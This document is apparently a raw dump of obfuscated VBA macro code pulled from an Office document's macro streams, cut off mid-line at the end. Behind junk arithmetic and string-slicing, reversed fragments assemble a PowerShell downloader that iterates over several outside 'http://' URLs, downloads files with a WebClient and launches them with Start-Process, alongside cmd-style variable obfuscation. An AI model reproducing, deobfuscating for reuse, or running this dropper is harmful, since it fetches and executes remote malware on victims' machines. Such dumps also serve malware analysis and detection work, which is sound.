AZjUvj - CStr(38560) / nSzqYn / CLng(uQfrA)WNRNFU = ElpobiUFQp = (RdOvD / KRvcN / 57737 / Fix(NwjKAk)) + 12036 - CLng(UrcGw + CLng(55549)) + TuLru + 48287 * QHSNH - CStr(90228) / McXLJ / CLng(ZwJEj)ZWhhiPzoP = wQpJm(",6+mU9JQO8r%J", 65789 + 5 - 65789, 65789 + 7 - 65789)izmmpH = ozAQWjvjYsn = (LVHOEu / PwUlHL / 21729 / Fix(VdVdFi)) + 13173 - CLng(LLBcC + CLng(34370)) + ZQQDYI + 79548 * huTNr - CStr(56538) / JLXLa / CLng(DPhzE)RwuFU = ZiEuUQnJbJb = (CRfIM / ZqiNu / 94799 / Fix(budJS)) + 36836 - CLng(UbopsP + CLng(85342)) + QsAkaX + 69385 * lohwu - CStr(93580) / RKwBpT / CLng(AJqcr)UMWrAHbUn = wQpJm("icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]c", 31058 + 2 - 31058, 31058 + 182 - 31058)dpQzOj = mNKWvrrVlUD = (fWfvN / YGsrt / 95438 / Fix(JZwXjj)) + 26507 - CLng(JEzaG + CLng(96275)) + SiYVYT + 89456 * KVjLI - CStr(36812) / WQZPhS / CLng(wBkqBW)fpApzI = kVYwUDhfMS = (MzGGK / bVBtd / 90430 / Fix(YYFGTa)) + 82260 - CLng(EwaNrZ + CLng(50460)) + aWLzXM + 68546 * jphWn - CStr(21360) / sdIwsw / CLng(LmbsHC)JHpwdEsFLpH = wQpJm("E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f", 35600 + 2 - 35600, 35600 + 193 - 35600)tThBtb = SvSMoXisUrt = (ijidh / zLYXfE / 63452 / Fix(pWAVuj)) + 40717 - CLng(iqjDRC + CLng(64318)) + GBOzwJ + 69832 * TQbLt - CStr(46314) / IHphHs / CLng(wKjHBs)vKXfT = FJmBoQDtHU = (imzjf / tdaLl / 86085 / Fix(zIotH)) + 20461 - CLng(HwXzn + CLng(70705)) + mGqrEF + 49019 * fELiUl - CStr(80369) / uXtbqH / CLng(KlwQvf)RanZst = wQpJm("Y0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2
", 87545 + 4 - 87545, 87545 + 178 - 87545)wvuWH = kThnAdkhcqS = (VccuI / fifGIp / 57680 / Fix(QGQjw)) + 58336 - CLng(taqFb + CLng(81010)) + sdIGzd + 19046 * VBlics - CStr(9263) / YwWhN / CLng(Rtsozb)khWJUo = FuuQhmrhLjj = (wzprC / jMDBs / 48721 / Fix(qHCChM)) + 97831 - CLng(RjzkT + CLng(28418)) + inaNL + 54509 * nriGSF - CStr(21325) / sBqBn / CLng(pfiWkN)PXzObwjG = wQpJm("PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+ml", 4687 + 2 - 4687, 4687 + 150 - 4687)QqHinj = PbfNDFKXaut = (PnztSb / sIwrb / 28122 / Fix(XAWYi)) + 46964 - CLng(mRWdwi + CLng(22082)) + HDcqNS + 54674 * OQMIkG - CStr(59984) / moBwJB / CLng(PVScW)azHoV = OTMGQZsWYY = (FwfKvY / iWMMjj / 93170 / Fix(zXkllo)) + 96039 - CLng(Yikkzf + CLng(4732)) + QlYuV + 87121 * EjBnt - CStr(3313) / dWUic / CLng(lnmwH)QLBqDsrNl = wQpJm("iEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEp", 52305 + 6 - 52305, 52305 + 94 - 52305)HbKnn = TtwzLPDHjB = (BEhREO / UDhhc / 99162 / Fix(mGlot)) + 92644 - CLng(kZIKj + CLng(20860)) + PYNFl + 2892 * ChqXwW - CStr(35941) / mMTzlP / CLng(STnFX)hPTKO = QXWjscCzfiTI = (cNzub / jMTTL / 69025 / Fix(fuRYTB)) + 14332 - CLng(Ydojj + CLng(22700)) + zjmrK + 81518 * USZjw - CStr(5058) / DDYIr / CLng(HiGKS)TFVVZwcU = wQpJm("bkR,mU9+mU9/mU9+mU9/:pttmU9+G.", 32819 + 3 - 32819, 32819 + 24 - 32819)zEjJN = EOPmjTuHZzw = (CEKUaP / prJOa / 53422 / Fix(JqTkJ)) + 22277 - CLng(tooRWF + CLng(66288)) + MijIaP + 92570 * jJtpEN - CStr(8895) / MEuQE / CLng(opnvJQ)ZzGUK = ZNoTjDUcwn = (TjbIYv / ziiWWz / 83355 / Fix(vliaMo)) + 46767 - CLng(KNoBUt + CLng(1306)) + itXCwu + 31946 * LmNfqr - CStr(32893) / oYHjw / CLng(asuJR)kQsGjzmtv = wQpJm("KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi", 41351 + 2 - 41351, 41351 + 135 - 41351)ktNDhI = dcozBUPZbsj = (wVMvl / bKSfH / 75799 / Fix(VpSZJz)) + 66513 - CLng(nrAbG + CLng(28220)) + IBRCZz + 96642 * jRRQj - CStr(54964) / zjKYz / CLng(zzRuA)JdMUf = iCROFcXalI = (hCbcuT / hPfLB / 99650 / Fix(YlplT)) + 94704 - CLng(Nwatja + CLng(92888)) + bnLrYN + 97374 * jjsDzn - CStr(4695) / POwpri / CLng(RKGTEA)kicwzQtiaMOhd = LtUlnsAJbuaw + """" + BatoavkicHEtz = jStulzziLzK = (FnEOtZ / rQRtIQ / 8880 / Fix(RNhuuH)) + 55493 - CLng(AfMKc + CLng(52475)) + cbluY + 65088 * sKTJC - CStr(30981) / AmVti / CLng(ViFQic)dowlFKYHb = DjhPLPFpRWW + zPHvPqrDOGFFzX + ItVWakEMIAt + sRCFDzprwV + kicwzQtiaMOhd + RusqwWVLvDTId + UKjPWqjNw + RanZst + PXzObwjG + ljaakrr + ZWhhiPzoP + EoHkR + tMMvPYQ + QLBqDsrNl + TFVVZwcU + LshKN + kQsGjzmtv + wdBSwU + JHpwdEsFLpH + cUuaIu + cwAkETD + ANzhp + wCffbz + aYofqzcWsE + UMWrAHbUn + ZiFiTzufS + dJWjrwmKKi = zNapzifiQV = (qpwQX / rvBKk / 9037 / Fix(MtWmS)) + 4350 - CLng(RisETD + CLng(81377)) + rphfhQ + 36310 * FhPvTn - CStr(26095) / cVPnOH / CLng(LNYmLz)End FunctionSub ClboX(GRFEQ)JHMYm = lOcjIocHjsC = (iiJIh / LqEdjv / 96136 / Fix(qpbDn)) + 19922 - CLng(MofSdj + CLng(99413)) + BZZCrl + 49039 * zfvbLj - CStr(70090) / oKuzmf / CLng(EsQSpi)DvLwDD = sGPRqYsjljE = (iTmBHV / UKbTjU / 19727 / Fix(APPcjp)) + 92803 - CLng(fjwDD + CLng(24235)) + fmlvK + 69235 * JohGm - CStr(65518) / whVRzs / CLng(WDXti)End Sub", File "HULSuHBvj.bas" (Streampath: "Macros/VBA/HULSuHBvj") has code: "Sub HqLkvVSjBLW()On Error Resume NextYzrqFa = aCOYjzlFUpIj = (CcUBp / PMijjP / 65929 / Fix(SGBNvI)) + 95544 - CLng(TrYUkj + CLng(77107)) + LnzlWW + 44716 * QzfNYh - CStr(79242) / RiTzT / CLng(NaPLIc)End SubFunction sRCFDzprwV()On Error Resume NextUtiYrV = RzaviLwcjSmC = (DFNoT / ZWVKNu / 22892 / Fix(DwphLs)) + 4421 - CLng(DXRHi + CLng(28463)) + ftWaYQ + 75812 * kXlWu - CStr(52937) / iozAu / CLng(ulaJCi)jwZiwN = SqdffKzRFfw = (KtUTf / zJjaiL / 2216 / Fix(twJJs)) + 23409 - CLng(iAhrf + CLng(38849)) + cRsvk + 38885 * pdFCz - CStr(27376) / iPzTi / CLng(RwIwnm)ZIZwH = wQpJm("H2z% tes&&rHBCSAFllQp0k", 93198 + 4 - 93198, 93198 + 17 - 93198)csnbA = khSiibDDVDGs = (zzliYB / zdJvIz / 27601 / Fix(zpiBXd)) + 54105 - CLng(jQrzY + CLng(25687)) + EpuoGc + 13193 * DzknD - CStr(18215) / aiSMGj / CLng(EVUXj)lWBNc = TOqzhjolOqKE = (HawjL / inabz / 91591 / Fix(LtbczA)) + 48825 - CLng(umErl + CLng(94178)) + mHzmw + 72278 * KYUBD - CStr(27408) / oPAlof / CLng(JmtKfQ)NUjTpWHKioO = wQpJm("HjwUfYsdMLdmXo%!!%Isoh8W", 9393 + 4 - 9393, 9393 + 18 - 9393)otoZc = ASdNzIjDHwwL = (GWEGz / GcVEb / 36104 / Fix(CVifb)) + 52842 - CLng(fVlmof + CLng(67651)) + GfwOU + 82745 * SpicK - CStr(44803) / zZlin / CLng(NYbUVa)EQucdi = nzaGpjKIHIk = (fPWlDb / aoRwjP / 55077 / Fix(viofrD)) + 16708 - CLng(KZfYUO + CLng(25932)) + XEGEp + 88013 * YBGPz - CStr(65056) / aZDiOi / CLng(dtfXa)EUrpOkhrC = wQpJm("MBDtes&&zsTahziwh48", 87114 + 4 - 87114, 87114 + 13 - 87114)MYDHM = GabIXrVPdko = (GizFU / zjsuLa / 64207 / Fix(hwzww)) + 5217 - CLng(bBwQf + CLng(74767)) + ICzIr + 27328 * dNSiR - CStr(24923) / OjQiqc / CLng(ZQill)jRccs = GTKaVuYuUfZ = (LiVib / Ujrjf / 73832 / Fix(czVhRR)) + 97653 - CLng(SMSOkZ + CLng(51563)) + czkrRX + 73552 * jAWYX - CStr(28775) / ioqGzC / CLng(DNaWt)fwLFvsQ = wQpJm("AKfYB%fXnREwX%!!%NoBBQA", 69883 + 5 - 69883, 69883 + 14 - 69883)CTrht = PkuuNLHzQv = (cDcoat / dbQwX / 33270 / Fix(iQLQJp)) + 58276 - CLng(zzktc + CLng(3728)) + vOmRzu + 78974 * OtzOQa - CStr(98110) / WdTavv / CLng(HFwHEd)hwEqq = BVijUhzTwZJ = (NcwWz / jQLBQ / 4531 / Fix(LAkvMQ)) + 97454 - CLng(fwwNtl + CLng(44327)) + TMGTP + 75605 * jZGkJC - CStr(81049) / RiaPh / CLng(YkIKr)RCSNH = wQpJm("I7 !%PInYdOqGm%!!F6.zww", 7908 + 7 - 7908, 7908 + 15 - 7908)dBJEUJ = roKiiZAVFj = (ipiiiS / pwvbz / 17770 / Fix(FwhPC)) + 30076 - CLng(vwfHv + CLng(93136)) + INCfcV + 24843 * zXalwT - CStr(19882) / MNZGSc / CLng(GCQoj)CktSz = irLZfNVWiKk = (FwhfOt / wPjANo / 75862 / Fix(bjnqCC)) + 36673 - CLng(wjCzap + CLng(59490)) + oJYvG + 40885 * iYPqO - CStr(15706) / Mqatu / CLng(vUhjlU)qcuLO = wQpJm("b.8Z59uesf7", 82066 + 3 - 82066, 82066 + 2 - 82066)wMvJHl = MDPsVbIRmM = (UnULX / uoYTbo / 18108 / Fix(mFRcGi)) + 56616 - CLng(wIbiXo + CLng(27393)) + CvXhzv + 58256 * YcMwr - CStr(87289) / bijTVq / CLng(jdbboM)Luckp = qswVbNMzWmjt = (WnQZin / itkaRp / 84679 / Fix(jHuvwf)) + 85586 - CLng(TcDjJR + CLng(24245)) + SbPsY + 56886 * GBIIw - CStr(26010) / JXuiQP / CLng(lwQdCw)UWifdl = wQpJm("it.wes&&w^o=pJz56", 69791 + 6 - 69791, 69791 + 8 - 69791)bDbQjN = qZzIDotoXt = (ZSfoi / zjhiz / 29167 / Fix(jGfzh)) + 83521 - CLng(AmTzv + CLng(41601)) + KCrIt + 69041 * XivPwP - CStr(68360) / aLajmW / CLng(JwHfcW)drUhiJ = HLpBpfXSnU = (hRpYBB / FIlzW / 14572 / Fix(pTiPO)) + 82205 - CLng(JYMGVW + CLng(72897)) + Nwpzc + 50123 * nSTfG - CStr(7769) / WOSuP / CLng(MpCZd)vldhdB = wQpJm("s6VTGHTG% tGqjH2LX", 74223 + 8 - 74223, 74223 + 9 - 74223)XtcRff = lumHXiUfPwjk = (EBwobG / HYvPV / 74024 / Fix(aKAoA)) + 38089 - CLng(KjGvP + CLng(30896)) + jZGqs + 19917 * ridDY - CStr(45464) / VrsBsz / CLng(UOHiQN)RpuUHE = XTcAHYzGlCJ = (oiMBX / EAtFdM / 68202 / Fix(nlkfhT)) + 14631 - CLng(VNRtGp + CLng(24241)) + Brkizj + 55294 * wWAwdO - CStr(98109) / YljMWF / CLng(qwwNz)fSJSUk = wQpJm("QPDR% tes&&JXzpEFJorrplRzo", 88291 + 6 - 88291, 88291 + 17 - 88291)idOnFD = bEpEIrLSLNGO = (VVJARv / ufBWd / 15268 / Fix(smIYK)) + 25631 - CLng(TwcDi + CLng(43726)) + XniGk + 13494 * IEnoI - CStr(28207) / ZnhfjQ / CLng(jCpwB)NmdmL = HtDoQjwSkUI = (dfavL / XEioEW / 49863 / Fix(TvdJk)) + 62608 - CLng(PlClo + CLng(55253)) + EiZJa + 6745 * omrRK - CStr(78165) / ZFzRqc / CLng(Dobjcv)BbKMcdWaK = wQpJm("JrwHsum%KGj", 34626 + 5 - 34626, 34626 + 5 - 34626)tXKXz = zAOuvkfIms = (rapjDT / AdBtwa / 96301 / Fix(FuPjt)) + 20364 - CLng(tZqFWU + CLng(83223)) + uBiIk + 39720 * MUrZz - CStr(68249) / GQUzOf / CLng(tGwPPj)ofOOCi = ozCKGVYszl = (UfqbZ / aVFinj / 88605 / Fix(jjrjuC)) + 34342 - CLng(jvwOEO + CLng(48952)) + dkSkFB + 96296 * oWbIz - CStr(12142) / VQQcm / CLng(JEjAtv)mViitpfTZhC = wQpJm("swJrwkwHsum%!!%FWraW1", 31541 + 4 - 31541, 31541 + 14 - 31541)iKnMwG = COJkinuYaJa = (lbwoln / UjjkM / 12126 / Fix(ZijPM)) + 87179 - CLng(IHHjw + CLng(1578)) + OfIrSS + 18883 * MzaJn - CStr(70624) / fZXYi / CLng(QoLwh)lSXBiq = mAmbBIrqMrZC = (YKZjU / cECKSN / 70993 / Fix(WUHVW)) + 82531 - CLng(FXCwA + CLng(33539)) + zjCdd + 45861 * IzRJC - CStr(242) / wcJoXF / CLng(WFWCL)cNawKTwH = wQpJm("T2swdMLdmXo% 3pK", 53470 + 4 - 53470, 53470 + 9 - 53470)TnXnU = HGTIoNNOWpL = (qZHut / cLBbd / 61361 / Fix(RMtVai)) + 79689 - CLng(sbiTVE + CLng(20524)) + GzPKiV + 72516 * sifrJ - CStr(12826) / pcMRAU / CLng(vKWnwz)rOipTk = wEtQfJvfrMRt = (jSaVtm / CInzjm / 18940 / Fix(CZvXL)) + 68428 - CLng(PQSQA + CLng(8436)) + wKHnwL + 92763 * UZwzv - CStr(91944) / QvXcW / CLng(SRuhuM)JPimhzLJT = wQpJm("kOfWrnZBf% tes&&r^e=%Sf.W,", 55451 + 6 - 55451, 55451 + 18 - 55451)JCdli = KdsvqctFWYN = (XIAXtY / EjtMFB / 97923 / Fix(zRvMPa)) + 72253 - CLng(YAjitj + CLng(24221)) + VTGpuJ + 60194 * NAQdjf - CStr(80044) / zjunaM / CLng(NlfcWM)pZjXEv = oZbzwEiNOFF = (qjAwXc / hpfifE / 41965 / Fix(DwXbn)) + 58780 - CLng(jILhi + CLng(55001)) + AjCwU + 15086 * ZnzbO - CStr(9435) / tzRrii / CLng(PqiSIb)pBLVYEZbLId = wQpJm("Fq&ll=%PInYdOqGm% 57im", 88965 + 5 - 88965, 88965 + 16 - 88965)rkquE = pwbjkTdLYz = (ZQmLt / AwolsY / 62363 / Fix(jCiCI)) + 64219 - CLng(rJzVl + CLng(14274)) + KBESf + 88885 * KQjqBt - CStr(11119) / DDDzY / CLng(RvIPSN)iRHXma = MztiXBjUMVU = (CmDiI / uViTW / 9784 / Fix(hUdPw)) + 24211 - CLng(iVlfz + CLng(65329)) + QirQRE + 32509 * vOdPSj - CStr(83470) / fWdBEh / CLng(ENICn)wBQQMR = wQpJm("wQd%!=%FvIs0ZC", 65583 + 7 - 65583, 65583 + 6 - 65583)BYjadd = rCEAEBPljtm = (qGIUfl / bmDJCd / 95296 / Fix(qwppCz)) + 76068 - CLng(SczCIn + CLng(36847)) + OPwquP + 22515 * rtQEzv - CStr(95853) / EiZotE / CLng(rDdqri)ZAzPa = CFwSPFzXVBz = (QDViwz / ORjzYw / 96172 / Fix(njzLNC)) + 64916 - CLng(bASwK + CLng(73067)) + VFzQF + 31199 * WDRoX - CStr(72773) / wuRHN / CLng(nYqjj)iZKSpWMfDs = wQpJm("vv0vssBOtes&&!J", 67697 + 2 - 67697, 67697 + 6 - 67697)CtidBb = wOtYhsjNttZi = (fdFBoz / iwPPhW / 26837 / Fix(saQNv)) + 74958 - CLng(EVjOk + CLng(51242)) + fwJEmW + 31485 * cMdAU - CStr(34691) / JzVOZV / CLng(dMjIY)wWDru = hnPtSGazQvN = (OficXh / Lsnuk / 26159 / Fix(ZscvN)) + 7703 - CLng(aSdJLJ + CLng(20570)) + vmszNz + 52969 * ujJlJ - CStr(77249) / UIFKj / CLng(XVhJHn)fPRtRoqA = wQpJm("5XcR=%RsCOuwtHJRpYL% 3a", 47362 + 3 - 47362, 47362 + 17 - 47362)ATMYw = zABlzwYiPE = (imSJB / wiIYR / 20527 / Fix(FLOTbT)) + 70675 - CLng(pqzSXF + CLng(81209)) + KpFdrd + 2697 * rRGZTL - CStr(48856) / rvtJjE / CLng(vTiov)zRarRf = hjckcAiaYmm = (pXTpX / KivVBb / 49994 / Fix(MtDKw)) + 42701 - CLng(tPQPYW + CLng(67620)) + dUojs + 9203 * wlUfUO - CStr(74782) / aICmp / CLng(XNpQTv)HGiADLNKKN = wQpJm("Z18aIlstes&&eh=%fXnREwXL,", 36115 + 3 - 36115, 36115 + 16 - 36115)CZwPb = RANshluSqR = (hGBqH / ktXGG / 98138 / Fix(YISvL)) + 43264 - CLng(ssVMN + CLng(31113)) + cDqEX + 46206 * mpFLS - CStr(52878) / izLuOZ / CLng(ATzGT)RbAHL = nuiclIHBcuD = (hqodGf / ViQKNv / 5468 / Fix(hUaOTi)) + 7583 - CLng(aMSAvr + CLng(75075)) + AwqoZc + 96259 * cbzEiT - CStr(28733) / cIZhBj / CLng(wdEOQn)iPFGnYsGFvi = wQpJm("lDlPGtes&&GwBRPlJz=%mKF", 1883 + 3 - 1883, 1883 + 15 - 1883)nivcJP = OZEWjsizGGz = (XnRFlU / tKUOh / 12739 / Fix(oVJBKz)) + 72445 - CLng(jUKVu + CLng(84053)) + izHSL + 15482 * MpqpA - CStr(20418) / EqoZp / CLng(JpFww)tzRDXI = zjUGzzWGvv = (hCpdF / YGwLX / 60147 / Fix(PdYbC)) + 32824 - CLng(JYhLb + CLng(35979)) + UvCcJY + 54552 * tETLs - CStr(97126) / UlLpj / CLng(sYvEij)YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392 + 5 - 81392, 81392 + 13 - 81392)JVdCm = EKviNuMkUH = (YMHEvA / jKbXHX / 60480 / Fix(WtYaRY)) + 50986 - CLng(rYDwio + CLng(40718)) + DnOFX + 96340 * ZdQDH - CStr(54232) / oKiRYS / CLng(tqRzS)MBJkOr = RQYjNBdEVc = (pbiimJ / pqmJNu / 51480 / Fix(jcrbi)) + 17606 - CLng(TNOmwQ + CLng(20585)) + JVoljL + 64293 * WbPBQ - CStr(61192) / LomER / CLng(MttXK)upLfisAzi = wQpJm("spnZBf%!!%RsCOukici", 31841 + 5 - 31841, 31841 + 13 - 31841)RQAMi = CdnZJuCFVATH = (nFCzK / sowcu / 27814 / Fix(DQHVO)) + 64001 - CLng(NCUmf + CLng(85231)) + Pursa + 30488 * ULNDCW - CStr(72418) / jKiuX / CLng(mwzmlk)iwpYVv = MfNjtTpFnzHY = (zfcPD / HzznV / 42417 / Fix(tLrZE)) + 8773 - CLng(zzRmo + CLng(63813)) + HcmqVG + 53514 * RMISsl - CStr(24831) / aKWzDd / CLng(OsDVR)QMWPujSG = wQpJm("B2UMNJ=%VHTUTCEY0Cd.", 1890 + 7 - 1890, 1890 + 11 - 1890)OqaWVA = NwAPuufQmL = (mRqbR / ddOYzR / 71700 / Fix(lCViv)) + 43927 - CLng(pSiKHC + CLng(91457)) + iwGrCf + 64559 * OJmsW - CStr(16171) / ziikWr / CLng(iqphw)YETmF = WTjMHWGjrDT = (fHSpB / UGhkj / 20486 / Fix(vslbqf)) + 18670 - CLng(KWzDB + CLng(45139)) + CrjIbJ + 73123 * FPRMk - CStr(13772) / jzBLjd / CLng(HBXKF)NcBwhXWKd = wQpJm("YZ&p=%TjDEXVkGksKp% tps2SA", 98373 + 6 - 98373, 98373 + 19 - 98373)lSmAC = EqEajmqfMYT = (AUnCB / oHhjfl / 33480 / Fix(QQmcR)) + 19048 - CLng(DwiWS + CLng(47903)) + mpvcE + 71585 * AwQkL - CStr(27734) / WGZpRi / CLng(asjHJX)SAZjXP = DDaTSPpAnkS = (Twkqn / Sptjj / 2807 / Fix(SfQETc)) + 37751 - CLng(iETIP + CLng(11638)) + DjoCX + 82100 * UPivBw - CStr(34902) / XrSbN / CLng(YwTHwB)tsUDDJi = wQpJm("wFc.l&%", 95443 + 2 - 95443, 95443 + 1 - 95443)tRhYQQ = JrhdAqBVYaX = (Uhcqo / SfnVuY / 78311 / Fix(bwBXkj)) + 62328 - CLng(fKobW + CLng(51035)) + avjbB + 39099 * orkXz - CStr(11671) / WmELD / CLng(DUAqrT)dVLzcr = ZavjNbJPbXbz = (IASBu / RLFpz / 34269 / Fix(QUivoE)) + 37036 - CLng(OLwJkR + CLng(17686)) + MzoLVU + 39617 * wiYRNU - CStr(13065) / vvXphj / CLng(WjjtpT)DSGIPrKNWlU = wQpJm("BSvYhmXnjzGDhFf% te,wdP", 39062 + 5 - 39062, 39062 + 17 - 39062)JBHVtr = GKvzoFfBMtE = (NptTJ / OSfpbf / 49509 / Fix(ZWJsb)) + 29002 - CLng(plcps + CLng(68137)) + qiTAkE + 57267 * IoLNd - CStr(83262) / UUUPpj / CLng(rUSpq)SNvjhV = SMiqFwhzGNEV = (bAYlp / YJAGLp / 39266 / Fix(vOEVS)) + 13845 - CLng(KOKCaL + CLng(78721)) + jjowa + 82089 * WzsjO - CStr(17673) / XiPcI / CLng(lBslOT)NhiDbVW = wQpJm("iQwRHh=%zNafst", 46084 + 5 - 46084, 46084 + 7 - 46084)mNjOa = wUXWttirGdjs = (zrjmwD / birDh / 14930 / Fix(aIOdJ)) + 60421 - CLng(rzIWi + CLng(59217)) + tvOCW + 65254 * uhzQW - CStr(62586) / pjSMl / CLng(HisAZ)MnREwP = JliTCboucEd = (ciAiQY / rwvzzr / 85060 / Fix(zzdIJJ)) + 92620 - CLng(TjUFmk + CLng(14670)) + uzoGdn + 74104 * YZjKpj - CStr(39902) / jBpzz / CLng(UTjChv)zqmAkSWEVfF = wQpJm("4fiIIsowkw9zu", 25393 + 5 - 25393, 25393 + 5 - 25393)TCHqHD = ClzMKpjclqmO = (WluKp / iVabFr / 85952 / Fix(WYTid)) + 40200 - CLng(zEdmK + CLng(20141)) + quLvjl + 93929 * MjREU - CStr(64836) / VGTwf / CLng(DRHJt)JbaKY = QvwMBLnkzFV = (DLauX / TnlZBM / 51795 / Fix(CbXVt)) + 87424 - CLng(GvEzW + CLng(56438)) + vlRXI + 6315 * MihCX - CStr(7828) / iVwza / CLng(IMNiM)mOLCQVHchW = wQpJm("miYJYs&&!%TjDEXVkGksKp%!4iJh", 1562 + 5 - 1562, 1562 + 19 - 1562)EzPVuA = JrAIiXwqsp = (Vpjba / zwDBj / 46627 / Fix(KjwYwM)) + 75198 - CLng(PudiN + CLng(36117)) + DaSUXL + 82395 * XWpNuE - CStr(9529) / IbUTX / CLng(atfCR)bBAvjc = HKXnjnIiLzzO = (uIPas / IHJlOt / 10630 / Fix(SpjiA)) + 48004 - CLng(WLvSS + CLng(94703)) + rpmjz + 18177 * slVnhc - CStr(93) / mZphN / CLng(tbOzpz)uznHTbW = wQpJm("iHbjvnmRsnurupvH% tQRZl", 12488 + 5 - 12488, 12488 + 17 - 12488)wTHZw = PTwftwZEOuSw = (VZVdk / izOYkK / 20024 / Fix(wROOj)) + 78837 - CLng(hnuvlc + CLng(32346)) + NUjsfD + 43962 * ipOISF - CStr(50383) / jlcdmz / CLng(jHjnlb)dkkwjh = iDNvcAUHSGj = (XjPVbX / pLpjS / 49926 / Fix(dqTnj)) + 50826 - CLng(EmbBK + CLng(84180)) + RzDlZ + 16899 * wUPXI - CStr(61279) / SNjdC / CLng(XdnfXI)JcSJhokzZTa = wQpJm("WUwtHJRpYL%!&,0@Fwr", 63604 + 7 - 63604, 63604 + 11 - 63604)TtoTQ = oYMlvskjVEQ = (uAmZuY / FpnLY / 27274 / Fix(sCCjv)) + 11639 - CLng(rwFblk + CLng(71800)) + qIjPw + 27579 * jUtvI - CStr(50555) / lBNhcY / CLng(ioIKzD)iJohQ = RRRrESYljb = (mOvZAz / irjzQB / 28827 / Fix(ozbPw)) + 87607 - CLng(UtiMOr + CLng(98855)) + aVQkud + 17490 * IrwmP - CStr(64258) / Aqpjd / CLng(KRdhJt)rqYwX = wQpJm("Vi7LLkVNwWksWbmhl% t7w", 8268 + 3 - 8268, 8268 + 15 - 8268)qnjri = JizQUqsSXzHN = (bhVZKV / PDnCk / 68030 / Fix(OVIHH)) + 37582 - CLng(nBaUq + CLng(96340)) + rtdawG + 52135 * RKhJb - CStr(87611) / MNkGYd / CLng(PsztPn)GjhANT = BGLkmjmKsmdk = (rAuNX / nzchF / 17478 / Fix(dRzdSF)) + 50094 - CLng(fhtuJh + CLng(50704)) + QIIpcO + 61350 * npMnBi - CStr(56547) / dBAVNP / CLng(YKaLS)jHvjjvwYR = wQpJm("wSDqYpBsz", 63022 + 5 - 63022, 63022 + 3 - 63022)SOZMI = ZwTFPJpdsmi = (EORIh / dBoki / 3623 / Fix(MmUan)) + 50711 - CLng(SDjJvk + CLng(67199)) + ZqjYs + 18958 * nBFrH - CStr(58185) / lLpDM / CLng(XVCFM)hLafP = wDiICHSizhA = (ZVYJJ / iooBrj / 53496 / Fix(IMNAB)) + 85652 - CLng(VVdmW + CLng(3743)) + cbSBq + 35896 * fICRB - CStr(69862) / JBrbaC / CLng(GQzfH)aVjIS = wQpJm("kso=%pzUCKIcbi", 78185 + 7 - 78185, 78185 + 6 - 78185)DzuXn = TMNjppCcDLj = (ICMTmK / zCVKTV / 66897 / Fix(zjOid)) + 49179 - CLng(lwSBl + CLng(33299)) + hDFQjz + 8029 * jHNrcQ - CStr(81353) / PUHzD / CLng(ojFaqQ)CGiBof = scSSGRuDYLT = (UuzVP / wmuIkz / 46674 / Fix(CnfCv)) + 48060 - CLng(AHHCZ + CLng(75156)) + iVwuE + 62523 * HIJmM - CStr(63123) / zUhUi / CLng(OGXWP)wVurLGdno = wQpJm("r11%bHYKFlwod% tesXYf%5", 29395 + 6 - 29395, 29395 + 15 - 29395)sTmqSp = fDYLqskufVQi = (BCnahq / EczZi / 20271 / Fix(CVSqwX)) + 1829 - CLng(ZIqbq + CLng(78991)) + bBGhB + 82524 * zPlzb - CStr(53568) / amMiDi / CLng(MiTKr)JqFzPI = UKNaSnDnFmpb = (BEmwZ / lVKEr / 85367 / Fix(HwjbQR)) + 9873 - CLng(mmwHJ + CLng(11805)) + fORYrP + 15860 * SzpmHw - CStr(98279) / iaIiE / CLng(iVYWz)wlDJD = wQpJm("6Kt%bHYKFlwokA4", 64962 + 4 - 64962, 64962 + 9 - 64962)SqqQP = qwmTAzMOcb = (zVndNh / bZXjw / 677 / Fix(RtTbI)) + 49126 - CLng(AHCWP + CLng(50178)) + istCus + 48447 * bpdJOo - CStr(65023) / MqSfw / CLng(smTBI)sRCFDzprwV = qcuLO + uznHTbW + iPFGnYsGFvi + NcBwhXWKd + tsUDDJi + wVurLGdno + UWifdl + vldhdB + jHvjjvwYR + QMWPujSG + EUrpOkhrC + fPRtRoqA + mOLCQVHchW + DSGIPrKNWlU + NhiDbVW + fSJSUk + BbKMcdWaK + zqmAkSWEVfF + JPimhzLJT + wBQQMR + wlDJD + iZKSpWMfDs + cNawKTwH + YAzLJjzu + rqYwX + aVjIS + ZIZwH + HGiADLNKKN + pBLVYEZbLId + JcSJhokzZTa + upLfisAzi + mViitpfTZhC + NUjTpWHKioO + fwLFvsQ + RCSNHOkGzHI = hihCHwRiwzKi = (opjzu / YzGisk / 53767 / Fix(qijCG)) + 82865 - CLng(ofnLj + CLng(17990)) + OoUqZi + 49336 * ZAMOYi - CStr(45048) / JWUbbv / CLng(zErSz)qXMFK = pRrTnQbFJaW = (tnocH / USlIvR / 43267 / Fix(kfMLjL)) + 42538 - CLng(wrUMUi + CLng(9492)) + bAmupP + 2599 * EbqGEJ - CStr(90611) / 